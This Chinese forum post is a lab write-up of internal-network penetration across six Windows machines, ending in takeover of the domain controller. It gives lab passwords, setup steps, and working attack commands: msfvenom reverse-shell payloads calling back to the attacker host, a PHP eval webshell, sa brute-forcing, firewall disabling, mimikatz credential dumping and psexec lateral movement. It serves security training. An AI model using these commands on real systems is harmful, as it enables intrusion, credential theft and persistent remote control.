用户
搜索

内网渗透(实验)之域渗透深入弹shell开3389拿域控

2019-2-20 14:08| 发布者: 桃子Tz| 查看: 171| 评论: 0|原作者: WaIdo

0x01 实验拓扑图及实验用IP



A组IP(实验用IP)


1号


账号:Administrator

密码:Jack@!@#


ip:192.168.141.111


2号


账号:ADMIN-PC/ADMIN

密码:123456hhhh.


222.18.158.244:7771


ip:192.168.141.138


3号


域名:hiro.com


管理员

账号:hiro\administrator

密码:hb123456,./$


域用户

账号:hiro.com/user1

密码:hb123456,./$


ip:192.168.141.100


Tips


里面设了静态ip 要改一下

已将加入过程总结


4号


账号:administrator

密码:Win@2003


ip:192.168.141.114


5号


账号:Administrator

密码:Win@2008


ip:192.168.141.115


6号


账号:Administrator

密码:Edvison233!


ip:192.168.141.116




0x02 环境搭建步骤


本模块中的IP只是作为范例,与正式实验中所用IP不同


一号机

系统:Windows 10

IP : 192.168.199.101

对三号机192.168.199.103开放445端口


配置步骤:



  1. 在虚拟机上安装win10系统

  2. 在网络共享中心配置静态IP


image



  1. 对3号机开放445端口:

    新建入站规则(选择自定义)

    image


应用于所有程序:

image


设置端口:

image


指定只对3号机开放:

image




二号机

系统:Windows 7

IP : 192.168.199.102


配置步骤:

安装Windows7,设置固定IP


image




三号机

系统:Windows 2012

IP : 192.168.199.103

对192.168.199.104开放445端口


配置步骤:

Windows server 2012 搭建域环境


计算机名:WIN-MT3C3TD4RQD.1.org

所在域名或工作组名称:1.org

IP地址:192.168.199.103

操作系统:Windows Server 2012 R2

密码   hb,./123456


安装步骤

1)    指定AD角色服务器的IP地址(这里的IP地址根据企业实际情况分配,但一定要是固定IP)


image


2)    点击Server2012左下角的“服务器管理器”显示如下界面


image


3)    点击“添加角色和功能按钮”弹出如下界面


image


4)    点击“下一步”

image


5)    这里选择”基于角色或基于功能的安装”,然后点”下一步”

image


6)    服务器选择这里选择默认的,假如你需要针对其它主机安装AD角色,这里可以选择你需要的主机,点击”下一步”

image


7)    这里勾选“Active Directory域服务”,当勾选这个选项时,会弹出如下对话框,点“添加功能”就OK

image


8)    这样就正确选择了安装AD角色,点击”下一步”

image


9)    功能页面不需要做任何选择直接点“下一步”

image


10) 这里是介绍AD角色的功能及注意事项,点击“下一步”

image


11) 勾选”如果需要,自动重新启动目标服务器”,然后点击”安装”

image


12) 安装成功后我们点击“关闭”,但这还没有完全安装成功

image


13) 点击服务器右上角的“功能按钮”

image


14) 弹出继续配置AD的对话框

image


15) 点击”部署后配置”,在红框处填入相应的域名

image


16) 点击“下一步”,红色方框选择域功能级别,绿色方框选择相应的功能,DNS/GC/RODC,黄色方框输入目录服务还原密码 密码是 hb,./123456

image


17) 点击“下一步”后配置DNS,由于不需要委派DNS,所以这里不需要设置,直接点击”下一步”

image


18) 这一步配置Netbios名,若没有特殊需求默认的就可以,直接点”下一步”


19) 配置日志,数据库,sysvol路径,若没有特殊需求,默认就可以

image


20) 查看配置信息,若没有任何问题直接点”下一步”


21) 这个页面是检测是否满足条件,满足条件后就可以直接点”安装”

image


22) 等待机器安装配置项,可能需要重启

image


23) 重启后我们会看到AD角色已经安装完成

image


验证安装




  1. 直接打开CMD命令行,输入”Net query fsmo”,这时会显示五种角色都已经安装成功

    image



  2. 若要进一步验证AD是否安装正确,可以使用DCDIAG /a命令行

    image


设置端口开放:

打开电脑找到控制面板,点击控制面板进入控制面板页面,点击系统和安全选项

进入系统安全页面,点击防火墙选项

进入windows防火墙面板,点击高级设置选项

进入高级设置选项,点击右键新建规则

进入规则想到页面,选择端口,点击下一步

进入设置端口页面,设置需要开放的445端口,点击下一步

选择允许链接,点击下一步

配置文件项,点击下一步

输入名称和描述,点击完成




四号机

系统:Windows 2003

本机密码为空

IP : 192.168.199.104

对192.168.199.105开放445端口

留Ms17010漏洞


配置步骤:

静态ip配置

image


设置本机管理员密码为空

image


防火墙配置

image

image


攻击实例

攻击机: kail     ip:192.168.246.128 (在本机验证时没有使用192.168.199.1xx的IP地址)

靶机: win 2003   ip:192.168.246.141


配置靶机只对攻击机开放445端口:

先启用防火墙:

image


然后编辑445端口

image

image


点击更改范围,再将攻击机的ip添加上去,这样就配好了。

image


配置ms17_010漏洞

因为win server 2003 在未打补丁时都有ms17_010漏洞,所以我直接展示利用过程。

利用msf进行攻击

image


获得shell

image




五号机

系统:Windows server 2008

IP : 192.168.199.105

对192.168.199.106开放80端口

安装PHP study ,MySQL弱口令


1、首先完成本机phpstudy及MySQL的安装

image

image


2、配置本机的静态IP为192.168.199.105

image


3、配置防火墙对六号机开放80端口

在命令行中使用wf.msc打开防火墙高级设置

image

image


在入站规则里添加新的规则,设置端口80

image


在新添加的规则右键属性

在作用域里添加本地IP地址为192.168.199.106,即六号机的IP

image

image




六号机

系统:Windows server 2008

IP : 192.168.199.106

对192.168.199.102开放1433端口

Sa账号为弱口令


本机是六号机

操作系统是 windows server 2008

Ip是 192.168.199.106

要求是配置一个sqlserver sa为弱口令的机器

对2号开放1433端口


首先,配置sqlserver

下载SQL Server安装程序

双击运行下载的SQL Server安装程序SQLEXPRWT_x64_CHS.exe。

打开SQLServer安装中心,在右边选择“全新安装或向现有安装添加功能”。

image


SQL Server开始安装准备。一直下一步。

在“数据库引擎配置”中,选择“混合模式”,并为“SQLServer系统管理员账户(sa)”指定密码,这里设置为弱口令

image


一直下一步 直到安装成功。


然后设置对二号机开放1433端口

第1步选择“打开或者关闭windows防火墙”把防火墙打开,然后选择“高级设置”,选择“创建规则”来指定端口。

image


现在“创建规则”,选择“端口”下--“TCP”和“特定本地端口”然后填写“1433”--下一步--下一步--为这个端口添加一个名称“1433”,然后确定就可以了。/3、在“入站规则”里选择刚才创建的规则,名称是“1433”,然后按照下图顺序就可以了。

image

image


配置成功


image




以下为内网渗透测试过程


0x03 使用kali拿下二号机


通过MobaXterm连接Kali Linux(ip:192.168.141.143),用户名:root,密码:toor


使用下述命令,执行,生成木马文件:


msfVENOM -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.141.143 LPORT=4444 -f exe > ./test.exe


生成了test.exe之后,然后在kali里,设定端口监听,等待目标上线


msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp;show options; set LHOST 192.168.141.143;set LPORT 4444; run"


在2号机上右击,以管理员权限执行。kali就可以接收到反弹回来的shell。对shell进行操作。


在kali里接收到了shell,可在meterpreter中管理shell,开启3389


在kali里接收到了shell,可在meterpreter中管理shell,开启3389


run post/windows/manage/enable_rdp

添加用户


run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."


然后在服务器主机中,用新添加的账号,远程桌面连接2号机,至此完成了对2号机的控制


2号机到6号机


使用nmap扫描发现192.168.141.116开了1433端口


nmap -p1433 --open 192.168.141.0/24


使用ms-sql-brute模块对6号机sa账户进行爆破,获得用户名为sa,密码为123456


nmap -p 1433 --script ms-sql-brute --script-args userdb=C:\Users\Waldo1111test\Desktop\name.txt,passdb=C:\Users\Waldo1111test\Desktop\password.txt 192.168.141.116


使用sqltools获取6号机数据库


用xp_cmdshell关闭防火墙限制


netsh firewall set opmode mode=disable


添加3389入站规则


netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow


创建管理员用户Waldo6TEST


net user Waldo6TEST 1234567hhhh. /add
net localgroup administrators Waldo6TEST /add




使用用户名Wado6TEST 密码1234567hhhh.成功登陆六号机


6号机到5号机


发现5号机开放80端口


输入://192.168.141.115/phpmyadmin/,弱口令 用户名root 密码root



尝试写入webshell



use mysql;
CREATE TABLE `mysql`.`d0g3` (`sn00py` TEXT NOT NULL );
INSERT INTO `mysql`.`d0g3` (`sn00py`)VALUES ('<?php @eval($_POST[zxsq-anti-bbcode-c]);?>');
SELECT sn00py FROM d0g3 INTO OUTFILE 'C:/pentest/phpstudy/WWW/shell.php';

Shell写到了:http://192.168.141.115/shell.php


使用菜刀连接



执行命令whoami,发现是administrator权限


image


加管理员用户


net user Waldo 1234567hhhh. /add
net localgroup administrators Waldo /add

打开5号机3389端口:


REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f


连接到远程桌面



5号机到4号机


在5号机上传ms17010攻击脚本,用kali攻击机生成一个payload


msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.141.143 lport=6666 -f exe -o shell.exe

开启msf监听


msfconsole -q
use exploit/multi/handler
set lhost 0.0.0.0
set lport 6666
exploit

在5号机中cmd中C:\Users\Waldo\MS17-010-master


在5号机上,运行ms170101攻击脚本(脚本要自己下载)


python zzz_exploit.py 192.168.141.114




在kali里接收到了shell,可在meterpreter中管理shell,开启3389


run post/windows/manage/enable_rdp

添加用户


run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."

在5号机远程登录4号机


4号机到3号机


在4号机中抓取hash


privilege::debug
sekurlsa::logonpasswords

抓到域控管理员账号和密码:



在4号机上,使用以下命令建立IPC$连接


net use \\192.168.141.100 "hb123456,./$" /user:"Administrator"


在4号机上,使用以下命令,将目标靶机的C盘映射到本地Z盘


net use z: \\192.168.141.100\c$



使用copy命令将先前生成的shell.exe拷贝至靶机C盘


copy shell.exe \\192.168.141.100\c$


在kali上开启监听(6666端口),使用psesec.exe.启动靶机上的shell.exe


p**ec.exe \\192.168.141.100 -u administrator -p hb123456,./$ c:\\shell.exe


成功反弹shell上线:



在kali里接收到了shell,可在meterpreter中管理shell,开启3389


run post/windows/manage/enable_rdp

添加用户


run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."


在4号机远程登录3号机

用户名:hiro\Administrator 密码:hb123456,./$



3号机到1号机


在3号机上,使用以下命令建立IPC$连接


net use \\192.168.141.111 "hb123456,./$" /user:"Administrator"


在3号机上,使用以下命令,将目标靶机的C盘映射到本地Z盘


net use z: \\192.168.141.111\c$



使用copy命令将先前生成的shell.exe拷贝至靶机C盘


copy shell.exe \\192.168.141.111\c$



在kali上开启监听(6666端口),使用p**ec.exe.启动靶机上的shell.exe


p**ec.exe \\192.168.141.111 -u hiro\Administrator -p hb123456,./$ c:\\shell.exe


成功获取shell



打开一号机3389



使用用户名:hiro\Administrator 密码: hb123456,./$登录



成功拿下一号机,实验成功!


鲜花
鲜花
握手
握手
雷人
雷人
路过
路过
鸡蛋
鸡蛋